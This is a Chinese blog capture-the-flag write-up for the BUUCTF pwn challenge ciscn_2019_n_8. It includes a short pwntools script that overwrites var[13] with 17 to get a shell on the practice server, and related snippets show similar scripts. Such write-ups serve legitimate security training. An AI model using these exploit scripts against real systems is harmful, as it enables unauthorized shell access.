BUUCTF-PWN-ciscn_2019_n_8

最新推荐文章于 2024-09-03 19:55:03 发布

Persistent_s

最新推荐文章于 2024-09-03 19:55:03 发布

阅读量276

点赞数

分类专栏： CTF pwn

本文链接：https://blog.youkuaiyun.com/Henlenl/article/details/116974036

版权

CTF 同时被 2 个专栏收录

28 篇文章

订阅专栏

pwn

7 篇文章

订阅专栏

文章目录

查看文件信息

checksec 一下,保护还开的挺满 canary(栈保护)，nx(堆栈不可执行)，PIE(地址随机化)
在这里插入图片描述

IDA 分析

其实我们应该nc 连一下的查看远程程序运行情况
在这里插入图片描述
丢入 32位IDA分析一下

在这里插入图片描述
很显然程序的意思就是让 var[13] == 17就能拿到shell了

exp

from pwn import *
r = remote('node3.buuoj.cn',27168)
#r = process('./ciscn_2019_n_8')
payload = p32(17) * 14

r.sendline(payload)

r.interactive()

确定要放弃本次机会？

福利倒计时

: :

立减 ¥

普通VIP年卡可用

立即使用

Persistent_s

关注关注

0
点赞
踩
0

收藏

觉得还不错? 一键收藏
0
评论
分享

复制链接

分享到 QQ

分享到新浪微博

扫一扫
举报

举报

专栏目录

BUUCTF pwn ciscn_2019_n_8

菜的只能随便写写博客

02-03

2716

0x01 文件分析文件很简单，32位，保护都开得差不多。 0x02 运行输入并且回显。 0x03 IDA源码分析 int __cdecl main(int argc, const char **argv, const char **envp) { int v4; // [esp-14h] [ebp-20h] int v5; // [esp-10h] [ebp-1Ch] ...

[BUUCTF]-PWN:ciscn_2019_n_3解析

2301_79326813的博客

01-20

910

堆题，先看保护32位，Partial RELRO，没pie关键信息就那么多，看ida大致就是alloc创建堆块，free释放堆块，dump打印堆块内容但是仔细看这三个函数就可以发现在实际运行中，会先创建一个存有free相关函数的地址和打印堆块内容相关函数的地址。看delete函数并结合动态调试，可以知道释放堆块的过程实际上是调用先创造的12字节堆块的rec_str_free。那也就意味着无论那块地址存的是哪里的地址，我们在free堆块时他都会执行，并且题目给了我们system。

参与评论您还未登录，请先登录后发表或查看评论

【BUUCTF - PWN】ciscn_2019_n_8

古月浪子的博客

03-27

1210

checksec一下，好叭全开 IDA打开看看，var是int数组，如果var[13]=0x11的话就能get flag from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' sla=lambda x,y:io.sendlin...

[BUUCTF-pwn]——ciscn_2019_n_8

Y_peak的博客

02-10

2642

[BUUCTF-pwn]——ciscn_2019_n_8 题目地址:https://buuoj.cn/challenges#ciscn_2019_n_8 题目上去checksec一下,吓一跳保护基本全开了。在IDA中一看，开心了。如此简单　只需要v[13] ==17 就好。因为var是以字符串的形式输入的。所以exploit如下: exploit from pwn import * p = remote("node3.buuoj.cn",29772) p.sendline("aaaa"*13 +

buuctf pwn ciscn_2019_n_8

zip471642048的博客

06-21

405

checksec 看一下基本信息把程序拖到ida32分析一波，可以看到读入字符串给了 var 然后后面的v4，v5没起作用，然后判断了var[13]是不是等于\x11,是就给一个shell 所以只要让我们输入的字符后13位等于...

Buuctf(pwn)ciscn_2019_n_8

半岛铁盒的博客

03-28

273

保护开的挺全; from pwn import* r=remote('node3.buuoj.cn',28155) payload = p32(17)*14 r.sendline(payload) r.interactive() 没利用漏洞,简单的输入满足条件就好了

【BUUCTF - PWN】ciscn_2019_c_1

古月浪子的博客

03-20

4222

checksec一下 IDA打开看看，encrypt函数内存在栈溢出漏洞由于程序会将输入的内容加密，这会破坏我们的payload，所以注意到strlen函数，通过在payload开头放上 \0 来绕过加密由于程序内没有后门函数，也没有system函数，所以考虑ret2libc 特别注意到题目是部署在Ubuntu18上的，因此调用system需要栈对齐，这里填充ret来对齐 from pwn...

BUUCTF ciscn_2019_c_1 题解

qq_51802916的博客

08-20

475

这个地方还会涉及到堆栈对齐的问题，有时候POC都构造正确了，但是运行时仍然报段错误，可能就是堆栈没有对齐，这是我们可以加入一条ret指令，改变一下堆栈，例如假如rsp指向了0xff88，这是一个没有对齐的地址，增加ret后就会变成0xff90，这个一个已经对齐的地址，可以正常运行。，这里显然可以进行缓冲区溢出利用，中间的部分是对字符串进行处理，我们不需要看得太仔细，因为可以通过传入\x00字符使循环提前终止，这样就不会影响我们的payload的了。的装载地址和shell字符串的装载地址，然后构造POC了。

BUUCTF栈迁移ciscn_2019_es_2

Rt1Text的博客

04-09

1129

1.checksec+运行获取基本信息 32位+NX堆栈不可执行 2.常规IDA操作 1.main函数并没有什么 2.int vul()函数程序主体,信息很多 1.两次read都在往同一个地方s处读入数据 2.要读入0x30,但s大小只有0x28,如果有后门函数,直接常规栈溢出操作但是shift+f12 这里仅仅是打印flag字符串,没有用同时查看hack函数 system里面的参数不是bin_sh不能直接用,所以要修改system的参数但是...

BUUCTF ciscn_2019_n_8

、moddemod

06-11

416

exp from pwn import * context.log_level = 'debug' proc_name = './ciscn_2019_n_8' p = remote('node3.buuoj.cn', 26801) # p = process(proc_name) payload = 'a'.encode() * 13 * 4 + p64(17) p.sendline(payload) p.interactive()

[buuctf]ciscn_2019_n_8

逆向萌新的博客

06-19

507

[buuctf]ciscn_2019_n_8

[BUUCTF] ciscn_2019_n_8

Lucien_Carr的博客

04-14

403

这道题非常简单（甚至比ret2text简单...），只需要满足让系统调用system函数的条件，即将var[13]这个数组里全部填上17即可。checksec --file='filename' # filename为下载文件的自定义名称。观察选择条件，只需要满足var[13] = 17就可以。前面有scanf函数，可以直接向var数组输入。开了canary、NX和PIE，似乎防得很严实。主函数里就调用了system函数，运气很好。32位程序，放到IDA中继续分析。攻击成功，运行结果如下。

BUUCTF pwn——ciscn_2019_n_8

CNS-Enterprise BCC-1701-J

03-15

214

BUUCTF 做题练习

buuctf——ciscn_2019_n_8

qq_41560595的博客

03-21

671

查看权限开了好多权限查看源代码分析观察，var数组是int类型，在内存中占了4个字节。输入一个字符串，令var[13]处的值是17，且这个值占4个字节，就能拿到shell。 var中每一个元素占4个字节，payload必须构造成"A"*13才能将前13个位置占满。第14个位置要求是4字节，就要用p64打包。解题代码 from pwn import * #p=process("./ciscn") p=remote("node3.buuoj.cn",25337) payload=b'AAAA'*

buuctf之ciscn_2019_n_8

weixin_54452942的博客

04-12

730

两个方法解题

buuctf ciscn_2019_n_8

carol2358的博客

04-15

306

ida: 直接有sh，只要让var[13]等于17就可以 exp： from pwn import * from LibcSearcher import * context.os='linux' context.arch='i386' context.log_level='debug' ru=lambda x:io.recvuntil(x) rl=lambda :io.recvl...

BUUCTF PWN wp--ciscn_2019_n_8